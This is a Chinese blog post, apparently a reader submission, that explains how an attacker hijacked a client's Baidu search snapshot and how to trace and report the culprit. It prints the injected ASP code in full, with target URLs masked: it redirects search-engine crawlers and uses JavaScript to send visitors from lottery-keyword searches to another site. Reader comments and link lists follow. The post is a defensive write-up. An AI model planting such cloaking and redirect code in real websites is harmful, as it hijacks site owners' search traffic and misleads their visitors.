-
写本篇文章的目的在于揭露一种黑客作弊的手段,也给那些疏于企业网站安全的站长提一个醒。同时提供一种追找黑客行踪的简单方法。
前几日,我的客户电话说自己的百度排名没有了,查询下竟然百度标签显示的内容是一家违禁词平台的网站内容。 我知道网站被黑客加入了非法代码,恶意篡改了百度快照。(截图如下)
查看“百度快照”出现的是一组跳转网站的广告内容。我们对客户设置的网站信息消失了。
1、黑客是如何修改百度快照的呢?
我进行了排查,客户的网站是使用asp源码开发的。发现有个文件被黑客写入了一段代码。
路径:Inc文件夹—SysProduct.asp文件里面最底下添加了如下代码:
<%
function Getbot()
dim s_agent
GetBot=""
s_agent=Request.ServerVariables("HTTP_USER_AGENT")
if instr(1,s_agent,"googlebot",1) > 0 then
GetBot="google"
end if
if instr(1,s_agent,"baiduspider",1) > 0 then
GetBot="baidu"
end if
end function
if GetBot="baidu" or GetBot="google" then
'
Response.Redirect "http://*********"(跳转的网站,引导百度抓取的内容)
else
'
Response.Write"<script type=""text/javascript"">var d=document.referrer;var re=/((wd|q|w|p|query)(=)([%A-Z0-9]*)(%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%AE%98%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%B9%B3%E5%8F%B0))/;if(re.test(d)){self.location='http://*********';(目标网站)window.adworkergo='ad_app6'}else{}</script>"
end if
%>
黑客设置的这串代码导致百度爬虫抓取网页的时候,直接抓取越过客户网站抓取了跳转网站内容,导致百度快照里面显示的是别的内容。使得客户本来排名首页的网站直接被百度屏蔽了。造成了客户很大的损失。
2、那么黑客是如何进入后台的呢?
黑客要进入后台,必须知道FTP账户和密码,以及IP地址。
造成的原因有如下几种:
1)一方面是FTP密码设置的时候比较简单化,很容易被利用软件破解掉,
2)另一方面选择便宜的空间也是一种隐患。因为空间IP以及用户名是很难被知道的,除非有人提供。
3、网站被黑之后,你如何追查黑客的来源?
方法比较简单,就是查询你跳转的目标网站的域名信息。一般情况下,都是一些小型的站长开发的赚钱网站,通过查询域名信息你可以获知该域名的归属人是谁,他有可能就是黑你网站的人。
如果是比较大型的网站利用外包的方式进行推广,那么你也可以得知负责人,给百度或者是网络警察举报一下,该网站存在恶意攻击修改内容的行为,毕竟它也有一定得责任。
通过中国万网Whois域名查询:比如我客户跳转的违禁词网站的域名信息如下:
1)第一个是:注册人
2)第二个是:联系电话
3)第三个是:联系邮箱
基本上你联系注册人就可以解决问题。如果对你客户造成的损失太大的话,建议你通过以下方式进行维权:
违法和不良信息举报中心:http://net.china.cn/
12321网络不良与垃圾信息举报受理中心:http://www.12321.cn/
国家互联网应急中心网络安全举报中心:http://www.cert.org.cn/
中国反钓鱼网站联盟认定及处理流程: http://www.cnnic.cn/
公安部信息网络安全报警网站:http://www.cyberpolice.cn/wfjb/
中国扫黄打非网:http://www.shdf.gov.cn/
北京市公安局网络违法犯罪举报网站:http://www.bj.cyberpolice.cn/index.jsp
希望本篇文章对你防黑有帮助。
感谢【网牛天下】的精彩分享
为价值买单(第四期):
如您觉得本文对您有价值,可自愿为本文作者打赏,金额随意,1元不嫌少,100不嫌多,您的打赏会直接进入作者支付宝帐户,也会激励作者创造出更优秀的内容。
支付宝账户:18813930880 (*燕东) (留言备注:卢松松博客打赏)
顶: 14 踩: 0
来源:卢松松博客 QQ/微信:13340454
百度快照是如何被黑客篡改的
| 阅读量 | 分类: 经验心得 | 作者: 读者投稿
相关文章阅读更多:网站安全 百度
- 2024-10-17 这才是阿里云注销测绘资质的原因,根本不是非法测绘
- 2024-07-09 微软要求中国员工必须用iPhone手机
- 2024-05-17 网站备案使得一些企业不得不放弃网站业务了
- 2023-11-11 百度K站新方法:站长被威胁深陷困境
- 2023-04-10 突发:百度云加速取消免费版
- 2021-12-16 网站使用qq、微信快捷登录的弊端,获取不到用户的真实联系方式!
- 2021-12-03 孔夫子旧书网要求提供两证:否则关店
- 2021-11-24 科牛接到了公安局网安大队的电话
- 2021-11-23 人人影视不可能再恢复或重启了
- 2021-04-21 网站降权不收录的原因竟然是302重定向
- 2021-03-29 Kangle CDN网站被关:公司多名高管被抓
- 2020-12-03 小网站有没有必要使用CDN
- 2020-11-26 买卖机械网遭遇DDos攻击:损失3.2万元CDN防护费
- 2020-11-11 紫菜头博客被DNS污染攻击关站
- 2021-09-08凡是在卢松松博客投稿的作者都有机会得到IT类图书哦!
发表感想加入微信群
sinesafe
欢威
武汉月嫂价格
孔子的故事
南宇博客
淘抢购
骆驼之
它们值得买
苍月
徐州网站建设
滑雪100
婚纱网站模版
塘沽热水器维修
徐国祥
风尚购物
学通数学
重庆二次供水
重庆东大胃肠
站长说说
广州seo
陌生的城市
cpa广告联盟
中国特种装备网
重庆滤油机
muzifeng
龙三公子
红色风流
社保查询
吃一点五谷杂粮
摩登女人街
网贷者网赚论坛
开智生福
玛咖弟弟
投资移民
百度竞价产品厂家
克维创想
广州
现在入侵人家会在意你什么ftp这些账号密码吗?
都是直接拿的shell的,别发这种没水准的分析了
快乐网
CCTV
LV钱包
fdsfds
任丘网站制作
云天博客
小木
汪棒棒
爆破测振仪
创业博客
品牌运动鞋3至6折
多梦
园林资料
酒神
多麦网
敦煌信息网
敦煌信息网
杭州八轴航拍服务
网赚天下
朱威的博客
宝宝屋
古交
元曦个人博客
初阳充值
好运鞋
野狼
难道我不会挂马么?
通过查询域名信息你可以获知该域名的归属人是谁?
你不知道Whois信息保护么?
呵呵。。
野狼
铝单板幕墙
wingsBlog
谢斌个人博客
天天淘购网
QQ泡沫乐园
华汇网
南昌装修
淘宝论坛
圆月博客
网赚猫wzmao.com
王语双个人网站
车8度
2016影视网
夏日博客
华海电脑网
进口食品批发
金牌供应商
乐
网站推广优化
微信群导航
华夏seo博客
野狼
提升机
闲逛折扣
宇成互联
北京电线电缆
沉香树
极品飞鸽
地摊袜子大全
深圳豫新创硅胶
长沙印刷公司
宇成互联